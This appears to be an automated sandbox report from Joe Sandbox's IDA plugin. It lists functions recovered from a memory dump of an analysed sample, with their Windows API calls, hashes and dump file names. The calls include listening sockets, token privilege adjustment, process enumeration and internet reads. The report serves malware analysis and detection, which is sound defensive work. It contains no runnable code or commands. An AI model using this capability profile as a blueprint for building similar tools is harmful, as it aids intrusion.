Opcode ID: 4cf3f3bb6fed10519e0d38ae882ff24942952c5b3bf07ce77ba9ffff7347fbf0
Instruction ID: cda3ea09f812dfd7170bcea7f52024073f765c668b2536d43ab2e177a127c14b
Opcode Fuzzy Hash: 4cf3f3bb6fed10519e0d38ae882ff24942952c5b3bf07ce77ba9ffff7347fbf0
Instruction Fuzzy Hash: B9014E317A1A1D6FF72862789C9BFFB725AEB05340F204635FB07E31D2DA511D0185A4

Function 00706283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007062DC
WSAGetLastError.WSOCK32(00000000), ref: 007062EB
bind.WSOCK32(00000000,?,00000010), ref: 00706307
listen.WSOCK32(00000000,00000005), ref: 00706316
WSAGetLastError.WSOCK32(00000000), ref: 00706330
closesocket.WSOCK32(00000000,00000000), ref: 00706344

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: bd1621f2fc4c2a018866e6e832fc1d0a1b3bbf80b19be6c4b2beddcbf05c9296
Instruction ID: 69c3a9ed87a802bc695ed2b6762e43b677b304d4633e3d2a6c3beda138c472be
Opcode Fuzzy Hash: bd1621f2fc4c2a018866e6e832fc1d0a1b3bbf80b19be6c4b2beddcbf05c9296
Instruction Fuzzy Hash: 60219E31600204DFCB10EF68C955A6EB7EAEF49720F14865DF816A72D1C778AD01CBA5

Function 006A5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 006B0DB6: std::exception::exception.LIBCMT ref: 006B0DEC
Part of subcall function 006B0DB6: __CxxThrowException@8.LIBCMT ref: 006B0E01

_memmove.LIBCMT ref: 006E0258
_memmove.LIBCMT ref: 006E036D
_memmove.LIBCMT ref: 006E0414

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: eb228f3db6b52c19363006bb8eaa21cdd68b269e671c73f7f68c25ebeb238523
Instruction ID: edb51e40152bc5f4b35c14a26355846ea9e0259875c38610f6209a225e33c0a6
Opcode Fuzzy Hash: eb228f3db6b52c19363006bb8eaa21cdd68b269e671c73f7f68c25ebeb238523
Instruction Fuzzy Hash: 6F02CFB0A00209DFDF04DF65D981AAEBBB6EF45300F148069E80ADB395EB75DD91CB94

Function 00691287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623

DefDlgProcW.USER32(?,?,?,?,?), ref: 006919FA
GetSysColor.USER32(0000000F), ref: 00691A4E
SetBkColor.GDI32(?,00000000), ref: 00691A61

Part of subcall function 00691290: DefDlgProcW.USER32(?,00000020,?), ref: 006912D8

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 27ae5097f9af746535a89c35327bf3aa4f2d9b00ca1800d43630846595e338d3
Instruction ID: cced630ee5a78dcf8e0527a5ab980b0fd7375b1d862f0c0684a563c9a3db2450
Opcode Fuzzy Hash: 27ae5097f9af746535a89c35327bf3aa4f2d9b00ca1800d43630846595e338d3
Instruction Fuzzy Hash: 28A14870102546BAEF28AB2C4C59EFF355FDB43341F34411EF402DEAD2CA289D4292B9

Function 00706747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00707D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00707DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0070679E
WSAGetLastError.WSOCK32(00000000), ref: 007067C7
bind.WSOCK32(00000000,?,00000010), ref: 00706800
WSAGetLastError.WSOCK32(00000000), ref: 0070680D
closesocket.WSOCK32(00000000,00000000), ref: 00706821

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: b563b2292eee26f32306305d9e1e708cf6ae3088cf49ed4bf5668a852b10ab49
Instruction ID: 209c651a6749f760ae90b54269a8653a900c0c8f8d2f50574a364fe2019daa93
Opcode Fuzzy Hash: b563b2292eee26f32306305d9e1e708cf6ae3088cf49ed4bf5668a852b10ab49
Instruction Fuzzy Hash: 87419E75A00210AFDF90AF288886F7E77EA9F45714F04855CFA19AB3D2DA749D0087A5

Function 00715376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007153C5
IsWindowEnabled.USER32 ref: 007153D3
GetForegroundWindow.USER32(?,?,00000001), ref: 007153E0
IsIconic.USER32 ref: 007153EE
IsZoomed.USER32 ref: 007153FC

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 2f7aa01d39794f015fa4dd9b13a4e84df0d70ff0e76f62d56ea913f56dd01b7f
Instruction ID: 8f370b3780ed8903a51fd783cdf5afb8ccf20908f6ed7d53bfbbea15f7454fbe
Opcode Fuzzy Hash: 2f7aa01d39794f015fa4dd9b13a4e84df0d70ff0e76f62d56ea913f56dd01b7f
Instruction Fuzzy Hash: 4B110431300910AFDB246F2EDC44AAEBB9EEF847A0B40842DF815D32C1DB78DC4186A8

Function 006E80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E80F6

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: bd924b43b6f613030febf65d9b0ef95057dacbb3f5ccb41adab79c8e77a63a03
Instruction ID: 6d8309f6c4c763c21e5ccd041cd19dad28bafac5602dd0f60c1b9293528cc6b2
Opcode Fuzzy Hash: bd924b43b6f613030febf65d9b0ef95057dacbb3f5ccb41adab79c8e77a63a03
Instruction Fuzzy Hash: C1F0C270241305BFEB104FA9EC8CEE73BADEF49754B008029F909C32A0DB649D11DA60

Function 00694B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00694AD0), ref: 00694B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00694B57

Strings

GetNativeSystemInfo, xrefs: 00694B51
kernel32.dll, xrefs: 00694B40

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 377fb98622cf5724a56b02258d63338a8cbd8fe497a2d8944db8e174dd10d7a4
Instruction ID: ef224ff505431a188b68b92a99f24406668a1cb378ea03596324de190c9d3d53
Opcode Fuzzy Hash: 377fb98622cf5724a56b02258d63338a8cbd8fe497a2d8944db8e174dd10d7a4
Instruction Fuzzy Hash: 1AD0C2B0A00717DFCB208F39E818F8272E9AF00350B10C839D485C2694DA78D4C0C618

Function 0070EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0070EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0070EE4B

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Process32NextW.KERNEL32(00000000,?), ref: 0070EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0070EF1A

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: d475977fc1d238a20c25eeae570d79ae3f7171031fdc56d829e5acd3e271dd40
Instruction ID: 8417e54f83587bb3a565760887f03699ae2a6d5dca11ce71f9e38760bdb47779
Opcode Fuzzy Hash: d475977fc1d238a20c25eeae570d79ae3f7171031fdc56d829e5acd3e271dd40
Instruction Fuzzy Hash: D951AD71104315AFD750EF24CC86EABB7ECEF94710F40492DF995972A1EB30A908CB96

Function 006EE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 006EE628

Strings

(, xrefs: 006EE66E
|, xrefs: 006EE658

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: dc9cdb2e37ba426c0f6c0196fffe83f9086734797bd328e6b1a47d551198e63a
Instruction ID: 43dd2a758d788f870fbab6789b7f90321403ac9f1eb3194aa8b901a0510c5601
Opcode Fuzzy Hash: dc9cdb2e37ba426c0f6c0196fffe83f9086734797bd328e6b1a47d551198e63a
Instruction Fuzzy Hash: 89323675A017059FDB28CF1AC4819AAB7F1FF48320B15C46EE89ADB3A1E771E941CB44

Function 007022EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0070180A,00000000), ref: 007023E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00702418

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: d9a92e6a7057bd7b2a57ea6126b6def44eb384969a17b6f1eb2e132fd4b08262
Instruction ID: 9611006c382ae4e087ae5961b9ff41d465f4b46f2771f9427cb8c6c87205ea51
Opcode Fuzzy Hash: d9a92e6a7057bd7b2a57ea6126b6def44eb384969a17b6f1eb2e132fd4b08262
Instruction Fuzzy Hash: BF4104B2904209FFEB20DE95DC89FBFB7ECEB40714F10416EF601A61C2DA789E429654

Function 006FB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006FB343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006FB39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006FB3EA

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: db868b55967bb674b7ffd5d6a863502748ccfe6ffc2ce9f84ea5648a9918d49a
Instruction ID: 1422730fb08edbab19dc65b1fe3361f8ca83b17300e990be669cf857fb8c056a
Opcode Fuzzy Hash: db868b55967bb674b7ffd5d6a863502748ccfe6ffc2ce9f84ea5648a9918d49a
Instruction Fuzzy Hash: 58216035A00518EFCF00EFA9D881AEDBBB9FF49310F1480AEE905AB351DB319915CB54

Function 006E87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 006B0DB6: std::exception::exception.LIBCMT ref: 006B0DEC
Part of subcall function 006B0DB6: __CxxThrowException@8.LIBCMT ref: 006B0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8858
GetLastError.KERNEL32 ref: 006E8865

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 66e21db4df77788476c31aeee35e1d7ca4cb147bf7c7a2e68018fd8202ed08d9
Instruction ID: 31206e1362e8ac23e12809e40a87edcab507bfd7c269e7d35c774c000cdc6c56
Opcode Fuzzy Hash: 66e21db4df77788476c31aeee35e1d7ca4cb147bf7c7a2e68018fd8202ed08d9
Instruction Fuzzy Hash: B4116DB2414305AFE718DFA5DC85DABBBADEB44710B20C52EE85A97251EA30AC418B64

Function 006E874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006E878B
FreeSid.ADVAPI32(?), ref: 006E879B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 2292f11ee986aba09917d42defcf006bd40d0e9ca550cc2811ca00aea5f1b766
Instruction ID: e5eb9e72202c83817519e1b1cc5369e45c8257caeb8b07cd9f00af71d3f8a7b4
Opcode Fuzzy Hash: 2292f11ee986aba09917d42defcf006bd40d0e9ca550cc2811ca00aea5f1b766
Instruction Fuzzy Hash: 41F04975A1130CBFDF00DFF4DD89AEEBBBCEF08211F1084A9E901E2291E6756A448B54

Function 006F8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 006F889B

Part of subcall function 006B520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006F8F6E,00000000,?,?,?,?,006F911F,00000000,?), ref: 006B5213
Part of subcall function 006B520A: __aulldiv.LIBCMT ref: 006B5233

Strings

0eu, xrefs: 006F8892

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0eu
API String ID: 2893107130-3822003923
Opcode ID: 12a0ad0ddfc7becaf02dd252299b6495fa9feb9435765e63c2aba1fef05ad7de
Instruction ID: 61ad08009b64492266cc41d68f2b461dab2035dc9adaa24c67f691efc45b3e4a
Opcode Fuzzy Hash: 12a0ad0ddfc7becaf02dd252299b6495fa9feb9435765e63c2aba1fef05ad7de
Instruction Fuzzy Hash: 5821B4726356148FC729CF35D841AA2B3E2EFA5311B688E6CD1F5CB2D0CA74B905CB54

Function 006F4C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 006F4CB3

Strings

DOWN, xrefs: 006F4C98

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 4ad4c8a4c44d00358d5d3393f34df38a1b991f6bfdfd1f53dfdcbe139c5c272a
Instruction ID: d5116f2fd1efcf5ff39aeb3335e16a0bd5f2b8fe5aaaf37b135eee05ec3c3848
Opcode Fuzzy Hash: 4ad4c8a4c44d00358d5d3393f34df38a1b991f6bfdfd1f53dfdcbe139c5c272a
Instruction Fuzzy Hash: 3BE08CB219D7223CB9482A19BC13EF7078D8B12735B10120AF910E59C1EE896C8325AC

Function 006FC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 006FC6FB
FindClose.KERNEL32(00000000), ref: 006FC72B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 38daf428856d1922ffe009ceaede86c6bd88da498699b0df58b59634f88778f9
Instruction ID: a5a7d2b9a4b607f0b0093c7b146366f9782f16e53ae03b9c3d44578cefc62919
Opcode Fuzzy Hash: 38daf428856d1922ffe009ceaede86c6bd88da498699b0df58b59634f88778f9
Instruction Fuzzy Hash: EA118E726006049FDB10EF29C845A6AF7E9FF85320F00CA1DF9A997291DB30A801CF95

Function 006FA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00709468,?,0071FB84,?), ref: 006FA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00709468,?,0071FB84,?), ref: 006FA0A9

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 149301c6b325fbc7eac6e4e7b00dd0dd853e4d2b3773a34fe81e2615502b4f3b
Instruction ID: 0a65a2f0c2dafaeee553e60603beafd66f0baeae10e5edbd694d8615a3ebf241
Opcode Fuzzy Hash: 149301c6b325fbc7eac6e4e7b00dd0dd853e4d2b3773a34fe81e2615502b4f3b
Instruction Fuzzy Hash: 73F0E23510422DABDB20AFA4DC48FFA736EFF09361F008169F918D7181CA309900CBA5

Function 006E81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E8309), ref: 006E81E0
CloseHandle.KERNEL32(?,?,006E8309), ref: 006E81F2

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
